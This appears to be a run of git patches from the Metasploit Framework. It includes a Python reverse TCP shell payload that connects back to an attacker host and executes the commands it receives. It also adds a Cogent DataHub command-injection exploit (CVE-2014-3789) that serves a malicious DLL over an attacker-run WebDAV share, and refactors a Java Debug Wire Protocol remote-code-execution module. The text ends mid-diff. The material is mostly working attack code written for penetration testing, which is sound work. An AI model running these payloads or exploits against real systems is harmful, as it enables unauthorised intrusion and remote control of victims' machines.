Msf::Sessions::CommandShellOptions + + def initialize(info = {}) + super(merge_info(info, + 'Name' => 'Command Shell, Reverse TCP (via python)', + 'Description' => 'Creates an interactive shell via python, encodes with base64 by design. Compat with 2.3.3', + 'Author' => 'Ben Campbell', # Based on RageLtMan's reverse_ssl + 'License' => BSD_LICENSE, + 'Platform' => 'python', + 'Arch' => ARCH_PYTHON, + 'Handler' => Msf::Handler::ReverseTcp, + 'Session' => Msf::Sessions::CommandShell, + 'PayloadType' => 'python', + 'Payload' => + { + 'Offsets' => { }, + 'Payload' => '' + } + )) + end + + # + # Constructs the payload + # + def generate + super + command_string + end + + # + # Returns the command string to use for execution + # + def command_string + cmd = '' + dead = Rex::Text.rand_text_alpha(2) + # Set up the socket + cmd << "import socket,os\n" + cmd << "so=socket.socket(socket.AF_INET,socket.SOCK_STREAM)\n" + cmd << "so.connect(('#{datastore['LHOST']}',#{ datastore['LPORT']}))\n" + # The actual IO + cmd << "#{dead}=False\n" + cmd << "while not #{dead}:\n" + cmd << "\tdata=so.recv(1024)\n" + cmd << "\tif len(data)==0:\n\t\t#{dead}=True\n" + cmd << "\tstdin,stdout,stderr,=os.popen3(data)\n" + cmd << "\tstdout_value=stdout.read()+stderr.read()\n" + cmd << "\tso.send(stdout_value)\n" + + # Base64 encoding is required in order to handle Python's formatting requirements in the while loop + cmd = "exec('#{Rex::Text.encode_base64(cmd)}'.decode('base64'))" + + cmd + end + +end + diff --git a/modules/payloads/singles/python/shell_reverse_tcp_ssl.rb b/modules/payloads/singles/python/shell_reverse_tcp_ssl.rb index 7601be09ea..652d094a5c 100644 --- a/modules/payloads/singles/python/shell_reverse_tcp_ssl.rb +++ b/modules/payloads/singles/python/shell_reverse_tcp_ssl.rb @@ -15,12 +15,12 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, - 'Name' => 'Unix Command Shell, Reverse TCP SSL (via python)', + 'Name' => 'Command Shell, Reverse TCP SSL (via python)', 'Description' => 'Creates an interactive shell via python, uses SSL, encodes with base64 by design.', 'Author' => 'RageLtMan', 'License' => BSD_LICENSE, 'Platform' => 'python', - 'Arch' => ARCH_CMD, + 'Arch' => ARCH_PYTHON, 'Handler' => Msf::Handler::ReverseTcpSsl, 'Session' => Msf::Sessions::CommandShell, 'PayloadType' => 'python', @@ -36,8 +36,7 @@ module Metasploit3 # Constructs the payload # def generate - vprint_good(command_string) - return super + command_string + super + command_string end # @@ -60,11 +59,10 @@ module Metasploit3 cmd += "\tstdout_value=proc.stdout.read() + proc.stderr.read()\n" cmd += "\ts.send(stdout_value)\n" - # The *nix shell wrapper to keep things clean # Base64 encoding is required in order to handle Python's formatting requirements in the while loop cmd = "exec('#{Rex::Text.encode_base64(cmd)}'.decode('base64'))" - return cmd + cmd end - end + From a53955adb7de6926fed9e6baab18cb3cda6cfb98 Mon Sep 17 00:00:00 2001 From: OJ <oj@buffered.io> Date: Wed, 4 Jun 2014 20:55:20 +1000 Subject: [PATCH 481/853] Updated more UINT TLVs to QWORDS All with the goal of removing more pointer truncation issues. --- .../post/meterpreter/extensions/stdapi/tlv.rb | 16 ++++++++-------- 1 file changed, 8 insertions(+), 8 deletions(-) diff --git a/lib/rex/post/meterpreter/extensions/stdapi/tlv.rb b/lib/rex/post/meterpreter/extensions/stdapi/tlv.rb index b56f22a102..510bd24330 100644 --- a/lib/rex/post/meterpreter/extensions/stdapi/tlv.rb +++ b/lib/rex/post/meterpreter/extensions/stdapi/tlv.rb @@ -12,10 +12,10 @@ module Stdapi # ## -TLV_TYPE_HANDLE = TLV_META_TYPE_UINT | 600 +TLV_TYPE_HANDLE = TLV_META_TYPE_QWORD | 600 TLV_TYPE_INHERIT = TLV_META_TYPE_BOOL | 601 -TLV_TYPE_PROCESS_HANDLE = TLV_META_TYPE_UINT | 630 -TLV_TYPE_THREAD_HANDLE = TLV_META_TYPE_UINT | 631 +TLV_TYPE_PROCESS_HANDLE = TLV_META_TYPE_QWORD | 630 +TLV_TYPE_THREAD_HANDLE = TLV_META_TYPE_QWORD | 631 TLV_TYPE_PRIVILEGE = TLV_META_TYPE_STRING | 632 ## @@ -100,7 +100,7 @@ PROCESS_EXECUTE_FLAG_DESKTOP = (1 << 4) PROCESS_EXECUTE_FLAG_SESSION = (1 << 5) # Registry -TLV_TYPE_HKEY = TLV_META_TYPE_UINT | 1000 +TLV_TYPE_HKEY = TLV_META_TYPE_QWORD | 1000 TLV_TYPE_ROOT_KEY = TLV_TYPE_HKEY TLV_TYPE_BASE_KEY = TLV_META_TYPE_STRING | 1001 TLV_TYPE_PERMISSION = TLV_META_TYPE_UINT | 1002 @@ -147,7 +147,7 @@ TLV_TYPE_PROCESS_SESSION = TLV_META_TYPE_UINT | 2308 TLV_TYPE_IMAGE_FILE = TLV_META_TYPE_STRING | 2400 TLV_TYPE_IMAGE_FILE_PATH = TLV_META_TYPE_STRING | 2401 TLV_TYPE_PROCEDURE_NAME = TLV_META_TYPE_STRING | 2402 -TLV_TYPE_PROCEDURE_ADDRESS = TLV_META_TYPE_UINT | 2403 +TLV_TYPE_PROCEDURE_ADDRESS = TLV_META_TYPE_QWORD | 2403 TLV_TYPE_IMAGE_BASE = TLV_META_TYPE_UINT | 2404 TLV_TYPE_IMAGE_GROUP = TLV_META_TYPE_GROUP | 2405 TLV_TYPE_IMAGE_NAME = TLV_META_TYPE_STRING | 2406 @@ -155,8 +155,8 @@ TLV_TYPE_IMAGE_NAME = TLV_META_TYPE_STRING | 2406 TLV_TYPE_THREAD_ID = TLV_META_TYPE_UINT | 2500 TLV_TYPE_THREAD_PERMS = TLV_META_TYPE_UINT | 2502 TLV_TYPE_EXIT_CODE = TLV_META_TYPE_UINT | 2510 -TLV_TYPE_ENTRY_POINT = TLV_META_TYPE_UINT | 2511 -TLV_TYPE_ENTRY_PARAMETER = TLV_META_TYPE_UINT | 2512 +TLV_TYPE_ENTRY_POINT = TLV_META_TYPE_QWORD | 2511 +TLV_TYPE_ENTRY_PARAMETER = TLV_META_TYPE_QWORD | 2512 TLV_TYPE_CREATION_FLAGS = TLV_META_TYPE_UINT | 2513 TLV_TYPE_REGISTER_NAME = TLV_META_TYPE_STRING | 2540 @@ -189,7 +189,7 @@ TLV_TYPE_DESKTOP_SCREENSHOT_PE64DLL_BUFFER = TLV_META_TYPE_STRING | 3012 # ## TLV_TYPE_EVENT_SOURCENAME = TLV_META_TYPE_STRING | 4000 -TLV_TYPE_EVENT_HANDLE = TLV_META_TYPE_UINT | 4001 +TLV_TYPE_EVENT_HANDLE = TLV_META_TYPE_QWORD | 4001 TLV_TYPE_EVENT_NUMRECORDS = TLV_META_TYPE_UINT | 4002 TLV_TYPE_EVENT_READFLAGS = TLV_META_TYPE_UINT | 4003 From 079fe8622a54a7c91b53e9dbc5668e9777565908 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 <juan_vazquez@rapid7.com> Date: Wed, 4 Jun 2014 10:29:33 -0500 Subject: [PATCH 482/853] Add module for ZDI-14-136 --- .../windows/http/cogent_datahub_command.rb | 434 ++++++++++++++++++ 1 file changed, 434 insertions(+) create mode 100644 modules/exploits/windows/http/cogent_datahub_command.rb diff --git a/modules/exploits/windows/http/cogent_datahub_command.rb b/modules/exploits/windows/http/cogent_datahub_command.rb new file mode 100644 index 0000000000..3d3f8db0cd --- /dev/null +++ b/modules/exploits/windows/http/cogent_datahub_command.rb @@ -0,0 +1,434 @@ +## +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + # Exploitation is reliable, but the service hangs and needs manual restarting. + Rank = ManualRanking + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::Remote::HttpServer::HTML + include Msf::Exploit::EXE + + def initialize + super( + 'Name' => 'Cogent DataHub Command Injection', + 'Description' => %q{ + This module exploits an injection vulnerability in Cogent DataHub prior to 7.3.5. The + vulnerability exists in the GetPermissions.asp page, which makes an insecure usage of + the datahub_command function with user controlled data, allowing execution of arbitrary + datahub commands. This module has been tested successfully with Cogent DataHub 7.3.1 on + Windows 7 SP1. + }, + 'Author' => [ + 'John Leitch', # Vulnerability discovery + 'juan vazquez' # Metasploit module + ], + 'Platform' => 'win', + 'References' => + [ + ['ZDI', '14-136'], + ['CVE', '2014-3789'], + ['BID', '67486'] + ], + 'Stance' => Msf::Exploit::Stance::Aggressive, + 'DefaultOptions' => { + 'WfsDelay' => 30, + 'InitialAutoRunScript' => 'migrate -f' + }, + 'Targets' => + [ + [ 'Cogent DataHub < 7.3.5', { } ], + ], + 'DefaultTarget' => 0, + 'DisclosureDate' => 'Apr 29 2014' + ) + register_options( + [ + OptString.new('URIPATH', [ true, 'The URI to use (do not change)', '/' ]), + OptPort.new('SRVPORT', [ true, 'The daemon port to listen on (do not change)', 80 ]), + OptInt.new('WEBDAV_DELAY', [ true, 'Time that the HTTP Server will wait for the payload request', 20]), + OptString.new('UNCPATH', [ false, 'Override the UNC path to use.' ]) + ], self.class) + end + + def autofilter + false + end + + def on_request_uri(cli, request) + case request.method + when 'OPTIONS' + process_options(cli, request) + when 'PROPFIND' + process_propfind(cli, request) + when 'GET' + process_get(cli, request) + else + vprint_status("#{request.method} => 404 (#{request.uri})") + resp = create_response(404, "Not Found") + resp.body = "" + resp['Content-Type'] = 'text/html' + cli.send_response(resp) + end + end + + def process_get(cli, request) + + if blacklisted_path?(request.uri) + vprint_status("GET => 404 [BLACKLIST] (#{request.uri})") + resp = create_response(404, "Not Found") + resp.body = "" + cli.send_response(resp) + return + end + + if request.uri.include?(@basename) + print_status("GET => Payload") + return if ((p = regenerate_payload(cli)) == nil) + data = generate_payload_dll({ :code => p.encoded }) + send_response(cli, data, { 'Content-Type' => 'application/octet-stream' }) + return + end + + # Treat index.html specially + if (request.uri[-1,1] == "/" or request.uri =~ /index\.html?$/i) + vprint_status("GET => REDIRECT (#{request.uri})") + resp = create_response(200, "OK") + + resp.body = %Q|<html><head><meta http-equiv="refresh" content="0;URL=#{@exploit_unc}#{@share_name}\\"></head><body></body></html>| + + resp['Content-Type'] = 'text/html' + cli.send_response(resp) + return + end + + # Anything else is probably a request for a data file... + vprint_status("GET => DATA (#{request.uri})") + data = rand_text_alpha(4 + rand(4)) + send_response(cli, data, { 'Content-Type' => 'application/octet-stream' }) + end + + # + # OPTIONS requests sent by the WebDav Mini-Redirector + # + def process_options(cli, request) + vprint_status("OPTIONS #{request.uri}") + headers = { + 'MS-Author-Via' => 'DAV', + 'DASL' => '<DAV:sql>', + 'DAV' => '1, 2', + 'Allow' => 'OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH', + 'Public' => 'OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK', + 'Cache-Control' => 'private' + } + resp = create_response(207, "Multi-Status") + headers.each_pair {|k,v| resp[k] = v } + resp.body = "" + resp['Content-Type'] = 'text/xml' + cli.send_response(resp) + end + + # + # PROPFIND requests sent by the WebDav Mini-Redirector + # + def process_propfind(cli, request) + path = request.uri + vprint_status("PROPFIND #{path}") + + if path !~ /\/$/ + + if blacklisted_path?(path) + vprint_status "PROPFIND => 404 (#{path})" + resp = create_response(404, "Not Found") + resp.body = "" + cli.send_response(resp) + return + end + + if path.index(".") + vprint_status "PROPFIND => 207 File (#{path})" + body = %Q|<?xml version="1.0" encoding="utf-8"?> +<D:multistatus xmlns:D="DAV:" xmlns:b="urn:uuid:c2f41010-65b3-11d1-a29f-00aa00c14882/"> +<D:response xmlns:lp1="DAV:" xmlns:lp2="http://apache.org/dav/props/"> +<D:href>#{path}</D:href> +<D:propstat> +<D:prop> +<lp1:resourcetype/> +<lp1:creationdate>#{gen_datestamp}</lp1:creationdate> +<lp1:getcontentlength>#{rand(0x100000)+128000}</lp1:getcontentlength> +<lp1:getlastmodified>#{gen_timestamp}</lp1:getlastmodified> +<lp1:getetag>"#{"%.16x" % rand(0x100000000)}"</lp1:getetag> +<lp2:executable>T</lp2:executable> +<D:supportedlock> +<D:lockentry> +<D:lockscope><D:exclusive/></D:lockscope> +<D:locktype><D:write/></D:locktype> +</D:lockentry> +<D:lockentry> +<D:lockscope><D:shared/></D:lockscope> +<D:locktype><D:write/></D:locktype> +</D:lockentry> +</D:supportedlock> +<D:lockdiscovery/> +<D:getcontenttype>application/octet-stream</D:getcontenttype> +</D:prop> +<D:status>HTTP/1.1 200 OK</D:status> +</D:propstat> +</D:response> +</D:multistatus> +| + # send the response + resp = create_response(207, "Multi-Status") + resp.body = body + resp['Content-Type'] = 'text/xml; charset="utf8"' + cli.send_response(resp) + return + else + vprint_status "PROPFIND => 301 (#{path})" + resp = create_response(301, "Moved") + resp["Location"] = path + "/" + resp['Content-Type'] = 'text/html' + cli.send_response(resp) + return + end + end + + vprint_status "PROPFIND => 207 Directory (#{path})" + body = %Q|<?xml version="1.0" encoding="utf-8"?> +<D:multistatus xmlns:D="DAV:" xmlns:b="urn:uuid:c2f41010-65b3-11d1-a29f-00aa00c14882/"> + <D:response xmlns:lp1="DAV:" xmlns:lp2="http://apache.org/dav/props/"> + <D:href>#{path}</D:href> + <D:propstat> + <D:prop> + <lp1:resourcetype><D:collection/></lp1:resourcetype> + <lp1:creationdate>#{gen_datestamp}</lp1:creationdate> + <lp1:getlastmodified>#{gen_timestamp}</lp1:getlastmodified> + <lp1:getetag>"#{"%.16x" % rand(0x100000000)}"</lp1:getetag> + <D:supportedlock> + <D:lockentry> + <D:lockscope><D:exclusive/></D:lockscope> + <D:locktype><D:write/></D:locktype> + </D:lockentry> + <D:lockentry> + <D:lockscope><D:shared/></D:lockscope> + <D:locktype><D:write/></D:locktype> + </D:lockentry> + </D:supportedlock> + <D:lockdiscovery/> + <D:getcontenttype>httpd/unix-directory</D:getcontenttype> + </D:prop> + <D:status>HTTP/1.1 200 OK</D:status> + </D:propstat> +</D:response> +| + + if request["Depth"].to_i > 0 + trail = path.split("/") + trail.shift + case trail.length + when 0 + body << generate_shares(path) + when 1 + body << generate_files(path) + end + else + vprint_status "PROPFIND => 207 Top-Level Directory" + end + + body << "</D:multistatus>" + + body.gsub!(/\t/, '') + + # send the response + resp = create_response(207, "Multi-Status") + resp.body = body + resp['Content-Type'] = 'text/xml; charset="utf8"' + cli.send_response(resp) + end + + def generate_shares(path) + share_name = @share_name + %Q| +<D:response xmlns:lp1="DAV:" xmlns:lp2="http://apache.org/dav/props/"> +<D:href>#{path}#{share_name}/</D:href> +<D:propstat> +<D:prop> +<lp1:resourcetype><D:collection/></lp1:resourcetype> +<lp1:creationdate>#{gen_datestamp}</lp1:creationdate> +<lp1:getlastmodified>#{gen_timestamp}</lp1:getlastmodified> +<lp1:getetag>"#{"%.16x" % rand(0x100000000)}"</lp1:getetag> +<D:supportedlock> +<D:lockentry> +<D:lockscope><D:exclusive/></D:lockscope> +<D:locktype><D:write/></D:locktype> +</D:lockentry> +<D:lockentry> +<D:lockscope><D:shared/></D:lockscope> +<D:locktype><D:write/></D:locktype> +</D:lockentry> +</D:supportedlock> +<D:lockdiscovery/> +<D:getcontenttype>httpd/unix-directory</D:getcontenttype> +</D:prop> +<D:status>HTTP/1.1 200 OK</D:status> +</D:propstat> +</D:response> +| + end + + def generate_files(path) + trail = path.split("/") + return "" if trail.length < 2 + + base = @basename + exts = @extensions.gsub(",", " ").split(/\s+/) + files = "" + exts.each do |ext| + files << %Q| +<D:response xmlns:lp1="DAV:" xmlns:lp2="http://apache.org/dav/props/"> +<D:href>#{path}#{base}.#{ext}</D:href> +<D:propstat> +<D:prop> +<lp1:resourcetype/> +<lp1:creationdate>#{gen_datestamp}</lp1:creationdate> +<lp1:getcontentlength>#{rand(0x10000)+120}</lp1:getcontentlength> +<lp1:getlastmodified>#{gen_timestamp}</lp1:getlastmodified> +<lp1:getetag>"#{"%.16x" % rand(0x100000000)}"</lp1:getetag> +<lp2:executable>T</lp2:executable> +<D:supportedlock> +<D:lockentry> +<D:lockscope><D:exclusive/></D:lockscope> +<D:locktype><D:write/></D:locktype> +</D:lockentry> +<D:lockentry> +<D:lockscope><D:shared/></D:lockscope> +<D:locktype><D:write/></D:locktype> +</D:lockentry> +</D:supportedlock> +<D:lockdiscovery/> +<D:getcontenttype>application/octet-stream</D:getcontenttype> +</D:prop> +<D:status>HTTP/1.1 200 OK</D:status> +<D:ishidden b:dt="boolean">1</D:ishidden> +</D:propstat> +</D:response> +| + end + + files + end + + def gen_timestamp(ttype=nil) + ::Time.now.strftime("%a, %d %b %Y %H:%M:%S GMT") + end + + def gen_datestamp(ttype=nil) + ::Time.now.strftime("%Y-%m-%dT%H:%M:%SZ") + end + + # This method rejects requests that are known to break exploitation + def blacklisted_path?(uri) + share_path = "/#{@share_name}" + payload_path = "#{share_path}/#{@basename}.dll" + case uri + when payload_path + return false + when share_path + return false + else + return true + end + end + + def check + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri('/', 'Silverlight', 'GetPermissions.asp'), + 'vars_post' => + { + 'username' => rand_text_alpha(4 + rand(4)), + 'password' => rand_text_alpha(4 + rand(4)) + } + }) + + if res && res.code == 200 && res.body =~ /PermissionRecord/ + return Exploit::CheckCode::Detected + end + + Exploit::CheckCode::Safe + end + + def send_injection(dll) + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri('/', 'Silverlight', 'GetPermissions.asp'), + 'vars_post' => + { + 'username' => rand_text_alpha(3 + rand(3)), + 'password' => "#{rand_text_alpha(3 + rand(3))}\")(load_plugin \"#{dll}\" 1)(\"" + } + }, 1) + + res + end + + def on_new_session(session) + if service + service.stop + end + + super + end + + def primer + print_status("#{peer} - Sending injection...") + res = send_injection("\\\\\\\\#{@myhost}\\\\#{@share_name}\\\\#{@basename}.dll") + if res + print_error("#{peer} - Unexpected answer") + end + end + + def exploit + if datastore['UNCPATH'].blank? + @basename = rand_text_alpha(3) + @share_name = rand_text_alpha(3) + @extensions = "dll" + @system_commands_file = rand_text_alpha_lower(4) + + @myhost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address('50.50.50.50') : datastore['SRVHOST'] + + @exploit_unc = "\\\\#{@myhost}\\" + + if datastore['SRVPORT'].to_i != 80 || datastore['URIPATH'] != '/' + fail_with(Failure::BadConfig, 'Using WebDAV requires SRVPORT=80 and URIPATH=/') + end + + print_status("Starting Shared resource at #{@exploit_unc}#{@share_name}\\#{@basename}.dll") + + begin + Timeout.timeout(datastore['WEBDAV_DELAY']) { super } # The Windows Webclient needs some time... + rescue ::Timeout::Error + service.stop if service + end + else + # Using external SMB Server + if datastore['UNCPATH'] =~ /\\\\([^\\]*)\\([^\\]*)\\([^\\]*\.dll)/ + host = $1 + share_name = $2 + dll_name = $3 + print_status("#{peer} - Sending injection...") + res = send_injection("\\\\\\\\#{host}\\\\#{share_name}\\\\#{dll_name}") + if res + print_error("#{peer} - Unexpected answer") + end + else + fail_with(Failure::BadConfig, 'Bad UNCPATH format, should be \\\\host\\shared_folder\\base_name.dll') + end + end + end + +end From 9ffe8d80b427171c61d0c877db3968559d7e56a5 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 <juan_vazquez@rapid7.com> Date: Wed, 4 Jun 2014 12:33:57 -0500 Subject: [PATCH 483/853] Do some metadata cleaning --- .../exploits/multi/misc/java_jdwp_debugger.rb | 73 ++++++++++--------- 1 file changed, 39 insertions(+), 34 deletions(-) diff --git a/modules/exploits/multi/misc/java_jdwp_debugger.rb b/modules/exploits/multi/misc/java_jdwp_debugger.rb index 959a0d7a65..a7b5999f17 100644 --- a/modules/exploits/multi/misc/java_jdwp_debugger.rb +++ b/modules/exploits/multi/misc/java_jdwp_debugger.rb @@ -6,13 +6,12 @@ require 'msf/core' class Metasploit3 < Msf::Exploit::Remote - Rank = ExcellentRanking + Rank = GoodRanking include Msf::Exploit::Remote::Tcp include Msf::Exploit::EXE include Msf::Exploit::FileDropper - HANDSHAKE = "JDWP-Handshake" REQUEST_PACKET_TYPE = 0x00 @@ -65,43 +64,50 @@ class Metasploit3 < Msf::Exploit::Remote def initialize super( - 'Name' => 'Java Debugging Wire Protocol Scanner', + 'Name' => 'Java Debug Wire Protocol Remote Code Execution', 'Description' => %q{ - This module abuses exposed Java Debugging Wire Protocol services in order - to execute code remotely. + This module abuses exposed Java Debug Wire Protocol services in order + to execute arbitrary Java code remotely. It just uses the protocol + features, since no authentication is required if the service is enabled. }, 'Author' => [ - 'Christophe Alladoum', # Exploit + 'prdelka', # Vulnerability discovery + 'Christophe Alladoum', # JDWP Analysis and Exploit 'Redsadic <julian.vilas[at]gmail.com>' # Metasploit Module ], 'References' => [ - ['http://docs.oracle.com/javase/1.5.0/docs/guide/jpda/jdwp-spec.html'], - ['http://www.exploit-db.com/papers/27179/'], - ['https://svn.nmap.org/nmap/scripts/jdwp-exec.nse'], - ['http://blog.ioactive.com/2014/04/hacking-java-debug-wire-protocol-or-how.html'] + ['OSVDB', '96066'], + ['EDB', '27179'], + ['URL', 'http://docs.oracle.com/javase/1.5.0/docs/guide/jpda/jdwp-spec.html'], + ['URL', 'http://www.exploit-db.com/papers/27179/'], + ['URL', 'https://svn.nmap.org/nmap/scripts/jdwp-exec.nse'], + ['URL', 'http://blog.ioactive.com/2014/04/hacking-java-debug-wire-protocol-or-how.html'] ], - 'DisclosureDate' => 'May 29 2014', - 'License' => MSF_LICENSE, 'Platform' => %w{ linux win }, - 'Privileged' => true, - 'Payload' => { 'BadChars' => '', 'DisableNops' => true }, - 'Targets' => + 'Arch' => ARCH_X86, + 'Payload' => + { + 'Space' => 2048, + 'BadChars' => '', + 'DisableNops' => true + }, + 'Targets' => [ - [ 'Windows x86 (Native Payload)', - { - 'Platform' => 'win', - 'Arch' => ARCH_X86, - } - ], [ 'Linux x86 (Native Payload)', { - 'Platform' => 'linux', - 'Arch' => ARCH_X86, + 'Platform' => 'linux' + } + ], + [ 'Windows x86 (Native Payload)', + { + 'Platform' => 'win' } ] ], - 'DefaultTarget' => 1 + 'DefaultTarget' => 0, + 'License' => MSF_LICENSE, + 'DisclosureDate' => 'May 29 2014' ) register_options( @@ -109,13 +115,13 @@ class Metasploit3 < Msf::Exploit::Remote Opt::RPORT(8000), OptInt.new('STATUS_EVERY', [true, 'How many iterations until status', 1000]), OptInt.new('RESPONSE_TIMEOUT', [true, 'Number of seconds to wait for a server response', 10]), - OptString.new('TMP_PATH', [ false, 'Overwrite the temp path for the file upload. Ensure there is a trailing slash', nil]) + OptString.new('TMP_PATH', [ false, 'A directory where we can write files. Ensure there is a trailing slash']), + OptString.new('BREAKPOINT', [ true, 'Frequently called method for setting breakpoint', 'java.net.ServerSocket.accept' ]), + OptPort.new('BREAKPOINT_PORT', [ false, 'If debugging an application accessible from network and breakpoint is on socket accept, set the port of the app to force a socket connection' ]) ], self.class) register_advanced_options( [ - OptString.new('BREAK_CLASS', [ true, 'Frequently called method for setting breakpoint', 'java.net.ServerSocket.accept' ]), - OptInt.new('BREAK_AUTOHIT_PORT', [ false, 'If debugging an application accessible from network and breakpoint is on socket accept, set the port of the app to force a socket connection', nil ]), OptInt.new('BREAK_TIMEOUT', [true, 'Number of seconds to wait for a breakpoint hit', 30]), OptInt.new('NUM_RETRIES', [true, 'Number of retries when waiting for event', 10]) ], self.class) @@ -151,7 +157,6 @@ class Metasploit3 < Msf::Exploit::Remote sock.put(HANDSHAKE) return sock.get(datastore['RESPONSE_TIMEOUT']) - end # Forges packet for JDWP protocol @@ -507,7 +512,7 @@ class Metasploit3 < Msf::Exploit::Remote # Waits user defined time for an event sent from the target VM (or force event if possible) def wait_for_event - force_net_event unless datastore['BREAK_AUTOHIT_PORT'].nil? || (datastore['BREAK_AUTOHIT_PORT'] == 0) + force_net_event unless datastore['BREAKPOINT_PORT'].nil? || (datastore['BREAKPOINT_PORT'] == 0) buf = read_reply(datastore['BREAK_TIMEOUT']) @@ -518,11 +523,11 @@ class Metasploit3 < Msf::Exploit::Remote # Force a network event for hitting breakpoint when object of debugging is a network app and break class is socket def force_net_event - vprint_status("#{peer} - Forcing network event over #{datastore['BREAK_AUTOHIT_PORT']}") + print_status("#{peer} - Forcing network event over #{datastore['BREAKPOINT_PORT']}") rex_socket = Rex::Socket::Tcp.create( 'PeerHost' => rhost, - 'PeerPort' => datastore['BREAK_AUTOHIT_PORT'], + 'PeerPort' => datastore['BREAKPOINT_PORT'], ) rex_socket.put(rand_text_alphanumeric(4 + rand(4))) @@ -845,14 +850,14 @@ class Metasploit3 < Msf::Exploit::Remote # Sets a breakpoint on frequently called method (user-defined) def set_breakpoint - vprint_status("#{peer} - Setting breakpoint on class: #{datastore['BREAK_CLASS']}") + vprint_status("#{peer} - Setting breakpoint on class: #{datastore['BREAKPOINT']}") # 1. Gets reference of the method where breakpoint is going to be setted - classname, method = str2fqclass(datastore['BREAK_CLASS']) + classname, method = str2fqclass(datastore['BREAKPOINT']) break_class = get_class_by_name(classname) - fail_with(Failure::NotFound, "Could not access #{datastore['BREAK_CLASS']}, probably is not used by the application") unless break_class + fail_with(Failure::NotFound, "Could not access #{datastore['BREAKPOINT']}, probably is not used by the application") unless break_class get_methods(break_class["reftype_id"]) From 3869fcb43834fadb5737642968092f7087939e8f Mon Sep 17 00:00:00 2001 From: jvazquez-r7 <juan_vazquez@rapid7.com> Date: Wed, 4 Jun 2014 12:41:23 -0500 Subject: [PATCH 484/853] common http breakpoint event --- modules/exploits/multi/misc/java_jdwp_debugger.rb | 8 ++++++-- 1 file changed, 6 insertions(+), 2 deletions(-) diff --git a/modules/exploits/multi/misc/java_jdwp_debugger.rb b/modules/exploits/multi/misc/java_jdwp_debugger.rb index a7b5999f17..d19d28bac0 100644 --- a/modules/exploits/multi/misc/java_jdwp_debugger.rb +++ b/modules/exploits/multi/misc/java_jdwp_debugger.rb @@ -525,15 +525,19 @@ class Metasploit3 < Msf::Exploit::Remote print_status("#{peer} - Forcing network event over #{datastore['BREAKPOINT_PORT']}") + print_status("#{rhost}") + print_status("#{datastore['BREAKPOINT_PORT']}") + rex_socket = Rex::Socket::Tcp.create( 'PeerHost' => rhost, 'PeerPort' => datastore['BREAKPOINT_PORT'], ) - rex_socket.put(rand_text_alphanumeric(4 + rand(4))) + rex_socket.put("GET / HTTP/1.0\r\n\r\n") rex_socket.shutdown - + rex_socket.close + print_status("BYE force_net_event") end From 7a5b5d31f9054c7a27b107b439ccbe9ac30366e9 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 <juan_vazquez@rapid7.com> Date: Wed, 4 Jun 2014 12:43:39 -0500 Subject: [PATCH 485/853] Avoid messages inside check --- modules/exploits/multi/misc/java_jdwp_debugger.rb | 14 ++++---------- 1 file changed, 4 insertions(+), 10 deletions(-) diff --git a/modules/exploits/multi/misc/java_jdwp_debugger.rb b/modules/exploits/multi/misc/java_jdwp_debugger.rb index d19d28bac0..4c59ef5666 100644 --- a/modules/exploits/multi/misc/java_jdwp_debugger.rb +++ b/modules/exploits/multi/misc/java_jdwp_debugger.rb @@ -129,22 +129,16 @@ class Metasploit3 < Msf::Exploit::Remote def check connect - - vprint_status("#{peer} - Checking for Java Debugging Wire Protocol") - res = handshake - disconnect - unless res - vprint_error("Unable to determine due to a connection timeout") + if res.nil? return Exploit::CheckCode::Unknown + elsif res == HANDSHAKE + return Exploit::CheckCode::Appears end - return Exploit::CheckCode::Appears if res == HANDSHAKE - - return Exploit::CheckCode::Safe - + Exploit::CheckCode::Safe end From 1ff539fc73bad6cc93fedc1485c565438ae9df22 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 <juan_vazquez@rapid7.com> Date: Wed, 4 Jun 2014 12:48:20 -0500 Subject: [PATCH 486/853] No sense to check two times --- modules/exploits/multi/misc/java_jdwp_debugger.rb | 10 +++------- 1 file changed, 3 insertions(+), 7 deletions(-) diff --git a/modules/exploits/multi/misc/java_jdwp_debugger.rb b/modules/exploits/multi/misc/java_jdwp_debugger.rb index 4c59ef5666..cd62066304 100644 --- a/modules/exploits/multi/misc/java_jdwp_debugger.rb +++ b/modules/exploits/multi/misc/java_jdwp_debugger.rb @@ -921,15 +921,11 @@ class Metasploit3 < Msf::Exploit::Remote @methods = {} @os = nil - - fail_with(Failure::NotVulnerable, "#{peer} - Doesn't seem to be vulnerable") if check == Exploit::CheckCode::Safe - - # To avoid connection refused due to previously opened connection during check - Rex::sleep(1) - connect - fail_with(Failure::UnexpectedReply, "Unexpected reply while executing the handshake") unless handshake == HANDSHAKE + unless handshake == HANDSHAKE + fail_with(Failure::NotVulnerable, "#{peer} - JDWP Protocol not found") + end # 1. Get the sizes of variably-sized data types in the target VM idsizes From 33a7bc64fa5df197a9632d1ad1cfded2a8c3e069 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 <juan_vazquez@rapid7.com> Date: Wed, 4 Jun 2014 13:18:59 -0500 Subject: [PATCH 487/853] Do some easy cleaning --- .../exploits/multi/misc/java_jdwp_debugger.rb | 248 ++++-------------- 1 file changed, 49 insertions(+), 199 deletions(-) diff --git a/modules/exploits/multi/misc/java_jdwp_debugger.rb b/modules/exploits/multi/misc/java_jdwp_debugger.rb index cd62066304..0b29ebe67c 100644 --- a/modules/exploits/multi/misc/java_jdwp_debugger.rb +++ b/modules/exploits/multi/misc/java_jdwp_debugger.rb @@ -309,83 +309,64 @@ class Metasploit3 < Msf::Exploit::Remote # Gets the sizes of variably-sized data types in the target VM - def idsizes - + def get_sizes + formats = [ + ["I", "fieldid_size"], + ["I", "methodid_size"], + ["I", "objectid_size"], + ["I", "referencetypeid_size"], + ["I", "frameid_size"] + ] sock.put(create_packet(IDSIZES_SIG)) response = 